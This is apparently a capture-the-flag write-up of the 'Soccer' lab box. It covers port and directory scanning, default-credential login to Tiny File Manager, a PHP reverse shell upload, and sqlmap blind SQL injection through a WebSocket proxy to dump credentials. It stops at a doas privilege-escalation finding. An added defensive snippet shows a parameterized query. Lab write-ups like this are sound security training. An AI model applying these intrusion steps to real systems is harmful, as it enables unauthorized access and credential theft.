Soccer

TAGS: WebSocket, NodeJS, Blind SQL injection, WEB
In this blog, I'll solve the Soccer box.
Firstly, add soccer.htb to /etc/hosts.
An Nmap scan shows three open ports: 22, 80 and 9091.
$ nmap -p- --open -T5 -n 10.10.11.194 -o nmap.txt
Starting Nmap 7.92 ( https://nmap.org )
Nmap scan report for 10.10.11.194
Host is up (0.046s latency).
Not shown: 61116 closed tcp ports (conn-refused), 4416 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9091/tcp open  xmltec-xmlmail
When navigating to the website, a static, non-interactive page is shown. Fuzzing with gobuster, the /tiny
subdirectory is found:
$ gobuster dir -u http://soccer.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://soccer.htb
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/02/21 12:40:52 Starting gobuster in directory enumeration mode
===============================================================
/tiny                 (Status: 301) [Size: 178] [--> http://soccer.htb/tiny/]
Progress: 220414 / 220561 (99.93%)
===============================================================
2023/02/21 12:44:41 Finished
Visiting http://soccer.htb/tiny/, a login page is found. Searching Google for Tiny File Manager
turns up its default credentials.
In the file manager a reverse shell can be uploaded; since there are already some PHP files there, I use
pentestmonkey's PHP reverse shell. After getting the shell back on port 4444, /etc/hosts on the box
lists a new domain, so let's add it to the local machine's /etc/hosts as well.
After registering on the soc-player.soccer.htb site, there is a ticket-checking feature.
Intercepting with Burp, we confirm that the website is using WebSockets.
Googling about WebSockets, I found a script that acts as a man-in-the-middle proxy for the payloads so
that sqlmap can be used. In the script there are two parameters that must be modified.
Web application source code:
Code:
After running the script, sqlmap can be pointed at the database through http://localhost:8081.
$ sqlmap -u http://localhost:8081/?id=1 -D soccer_db --tables -T accounts -C username,password --dump
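The root cause of the injection that sqlmap confirms above, as an added example that is not the box's source code or the author's: the WebSocket ticket-lookup handler in its injectable form next to a hardened one. The message shape, table name and column are assumptions, and the database driver call is replaced by returning the SQL text and its bound parameters so the difference can be seen offline.

```javascript
// Added example, not the box's code. Assumed: the client sends {"id": "..."}
// over the WebSocket and the server looks the id up in a "tickets" table.
// Instead of calling a driver, each handler returns the SQL text plus the
// values it would bind, so the two styles can be compared without a database.

// Pattern to avoid: the client-supplied id is spliced into the SQL string,
// so whatever the client sends becomes part of the WHERE clause.
function vulnerableTicketQuery(rawMessage) {
  const msg = JSON.parse(rawMessage);
  return { sql: `SELECT id FROM tickets WHERE id = ${msg.id}`, params: [] };
}

// Rejected ids are recorded so that a burst of them, which is what an
// automated injection run produces, is visible in the server's logs.
const rejectedIds = [];

// Hardened form: parse defensively, accept only a plain decimal integer, and
// hand the value to the driver as a bound parameter rather than as SQL text.
function hardenedTicketQuery(rawMessage) {
  let msg;
  try {
    msg = JSON.parse(rawMessage);
  } catch {
    return { error: 'malformed message' };
  }
  if (msg === null || typeof msg !== 'object' || !('id' in msg)) {
    return { error: 'missing id' };
  }
  // Allow-list check: digits only, bounded length, nothing else accepted.
  const id = String(msg.id);
  if (!/^[0-9]{1,10}$/.test(id)) {
    rejectedIds.push(id);
    return { error: 'invalid id' };
  }
  // The '?' placeholder is filled in by the driver (for example mysql2's
  // execute()), so the value can never change the statement's structure.
  return { sql: 'SELECT id FROM tickets WHERE id = ?', params: [Number(id)] };
}
```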
Let's use these credentials to log in via SSH. To escalate privileges, run linpeas and enumerate:
[+] Checking doas.conf
permit nopass player as root cmd /usr/bin/dstat